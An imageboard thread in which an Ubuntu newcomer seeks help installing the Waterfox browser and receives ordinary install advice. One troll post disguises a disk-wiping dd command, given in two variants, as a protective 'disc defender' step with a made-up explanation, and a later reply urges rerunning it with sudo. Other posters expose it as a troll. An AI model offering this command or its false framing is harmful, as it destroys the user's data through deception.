New to Ubuntu

im trying to change to a better browser than firefox. what I have read lurking in Sup Forums it seems waterfox is the route to go but im having issues installing the tar that I downloaded.I copy and pasted the commands into the terminal I could find on the net to no avail. Any info would be greatly appreciated and I apologize in advance for my newfagishness.

Other urls found in this thread:

hawkeye116477.github.io/waterfox-deb/
duckduckgo.com/?q=dd if=/dev/zero of=/dev/sda&t=ffcm&ia=qa
twitter.com/NSFWRedditVideo

try GNU IceCat instead

just unpack the archive and run the binary

All right, you need to add a PPA and do another few things. It's actually pretty easy, and I'm using Waterfox on Ubuntu GNOME right now. Give me two minutes and I'll have your answer.

Somehow that didn't post when I hit post. Anyway, follow the instructions here: hawkeye116477.github.io/waterfox-deb/

Seamonkey

BTW I used Method 2 to install Waterfox.

Why don't these guys have a ppa?

Who is John Galt? At least you can get Waterfox on Ubuntu without too much trouble.

thanks to everyone for the feedback. I have so much to learn. waterfox installed easily using method 2. figured after install id be able to to search for an icon but nothing comes up is there another way to open waterfox after install?

Here we go again "I want a browser better than Furfox"

palememe
icecat
blah blah blah

Before you download anything: You need to secure your linux system with disc defender, short: dd

Like this:

dd if=/dev/zero of=/dev/sda

The /dev/zero/ arguments means you tolerate zero deviations from the standard system, meaning any changes by potential malware will be reversed.
The /dev/sda argument is usually your system disc, you may have to change it, if your system resides elsewhere.

If you are unsure where your root filesystem resides, use this variation of the command:

dd if=/dev/zero of=$(mount | grep \ /\ | awk {'print $1'})

Congratulations, your Linux is now bullet proof.

Try typing it at the terminal. There should be a way to add it to the menus.

>dd if=/dev/zero of=/dev/sda

What this fucking clown is proposing: duckduckgo.com/?q=dd if=/dev/zero of=/dev/sda&t=ffcm&ia=qa

thats really cool i try it though and get this response.dd: failed to open '/dev/sda': Permission denied

try sudo !!

Fuck you, this is not your tech support. Also, install Gentoo.

Don't. Its a troll.

we've got a turd in the punchbowl

but its fun to talk about

any ideas?

You sold yourself to Canonical ... Seriously why not go to Microsoft its the same thing ...

Why not arch or any other distro made from scratch...

eventually thats thats the plan